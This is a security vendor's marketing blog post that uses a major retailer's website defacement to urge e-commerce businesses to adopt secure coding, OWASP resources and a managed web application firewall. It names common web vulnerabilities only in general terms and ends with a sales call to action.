Making Headlines for the Wrong Reason… Don't let it Happen to You.

It even appeared on TMZ.com; one of the world's largest retailers had their website defaced so they were now selling a grill to cook babies. This was, of course, inappropriate and unacceptable for any retailer to host on their website, and most likely the reason major news outlets widely publicized the defacement. The hackers had achieved exactly what they had intended: a global company with well-publicized family values was terribly embarrassed.

If this happened to one of the largest global retailers, can it happen to you?

In this competitive ecommerce environment, price and availability is everything. The consumer looks for the best price; after all, that's one of the primary benefits of shopping online. We can price shop by simply clicking a link or two. Sometimes we even use applications built to do all the clicking and searching for us, so we get a list of comparative pricing. If your company sells what we are looking for and at the price we like, congratulations! You've just made a sale. Making the sale means you've succeeded in staying ahead of your competitors.

To get your buyers to this sweet spot, however, your organization needs to keep your website dynamic—and dynamic means change. Unfortunately, attackers love the need ecommerce businesses have for change, because it oftentimes means rushing through development, testing and production (making your website changes "go live"). 

Web security vulnerabilities can often surface during the development, test and production phases of a site update. The philosophy of many ecommerce organizations is "we need to get this new product or new pricing out there – we'll deal with the security later." Most times, however, "later" never comes or it comes too late. Application developers may miss critical steps in developing secure code due to lack of knowledge or training, or simply because they've let it slip in all the rush to make the change or update on the website. The testing phase may falter for the same reasons, and code may be deployed into the production environment and out to the world at large because it's assumed it has been sufficiently tested for vulnerabilities.

It doesn't matter how large or small your company's ecommerce footprint is, as evidenced by the defacement suffered by the global retailer mentioned earlier. Attackers seek opportunity, and all ecommerce sites present it. Some of the most commonly abused Web vulnerabilities include SQL injection (adding SQL code into a form to gain access to resources), cross-site scripting (injecting malicious script into Web pages) and buffer overflows (where temporary data storage is purposely overwritten so malicious code may be introduced). Exploiting these vulnerabilities can allow your attacker to steal credit card data, access confidential information or even bring your website down. Attackers may be more interested, however, in causing embarrassment to organizations, as in the case described earlier, or they may simply be information-gathering so they can plan a larger-scale attack later.

The good news is that there are excellent resources available to help reduce risk. One organization in particular—the Open Web Application Security Project (OWASP) —publishes resources free of charge to assist with generating awareness of secure coding practices. Their guide to coding against the Top Ten Web Vulnerabilities can be downloaded here: https://www.owasp.org/index.php/OWASP_Top_Ten_Project.

The bad news is that even if your organization has followed secure coding development, testing and deployment practices from start to finish, you're still at risk (albeit reduced) from an ever-growing Web vulnerability landscape. Simply put, the attackers have all the time in the world to try to figure out new ways to breach your website and cause havoc—more time, unfortunately, than your application and security teams have.

This is where a Web Application Firewall (WAF) helps. Think of a WAF as a firewall focused on your applications instead of network traffic. Whereas your perimeter firewall would likely consider an application attack to be acceptable traffic, the WAF is intended to stop it in its tracks. Subsequently, the WAF fills in the gaps left by human error as well as incorrect or inadequate coding practices. Of course, the WAF can only achieve what it's configured and maintained to do. Therefore, it's critical to keep it updated and current once deployed.

If you're considering employing a WAF but simply don't have the time or skill set to manage it, you may want to outsource the task to a Managed Security Services Provider (MSSP).  MSSPs specialize in delivering the technical expertise and security know-how required to keep your business secure, making it simple and affordable for you to receive enterprise-grade security.

Learning from attacks suffered by other organizations helps, but that knowledge can only take you so far. New Web application vulnerabilities surface regularly. Are you prepared to safeguard your business from risk? Click here to learn how a WAF might help your business, or if you'd like to just ask questions about your business's security in general, give ControlScan a call at 1-800-825-3301 x 3. We'd be happy to help.